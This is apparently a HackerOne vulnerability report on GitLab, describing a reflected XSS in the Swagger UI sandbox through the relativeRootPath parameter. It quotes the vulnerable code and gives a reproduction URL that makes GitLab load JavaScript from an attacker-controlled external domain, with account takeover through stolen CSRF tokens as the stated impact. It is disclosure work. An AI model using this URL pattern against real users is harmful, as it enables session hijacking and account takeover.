[gitlab.com] Reflected External Path Injection in Swagger UI at /-/sandbox/swagger via relativeRootPath parameter Leading to XSS & Account Takeover
HackerOne report #3317485 by x0abcd_ on 2025-08-27, assigned to @gandrews7:
Report | Attachments | How To Reproduce
Report
Summary:
I discovered a reflected Cross-Site Scripting (XSS) vulnerability on https://gitlab.com/-/sandbox/swagger via the relativeRootPath parameter. This vulnerability allows an attacker to inject an external domain that serves malicious JavaScript, which is then executed in the context of gitlab.com.
vulnerable code can be found Here : https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/assets/javascripts/blob/openapi/index.js
const getSandboxFrameSrc = () => {
const path = joinPaths(gon.relative_url_root || '', SANDBOX_FRAME_PATH);
const absoluteUrl = relativePathToAbsolute(path, getBaseURL());
const displayOperationId = getParameterByName('displayOperationId');
const params = { displayOperationId };
if (window.gon?.relative_url_root) {
params.relativeRootPath = window.gon.relative_url_root;
}
return setUrlParams(params, absoluteUrl);
}; By abusing this behavior, an attacker can execute arbitrary JavaScript in the victim’s browser, potentially leading to full account takeover by performing authenticated actions using stolen CSRF tokens.
Steps To Reproduce:
-
Visit the following URL:
https://gitlab.com/-/sandbox/swagger?relativeRootPath=https://blog.ryukudz.com
-
GitLab will attempt to load JS from:
https://blog.ryukudz.com/assets/webpack/vendors-openapi.<hash>.chunk.js - If the attacker controls the external domain, they can serve malicious JS under that path (e.g., redirect to a malicious
poc.js). - Once visited by an authenticated user, the JS executes in the context of
gitlab.com.
Impact
Arbitrary JavaScript execution
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: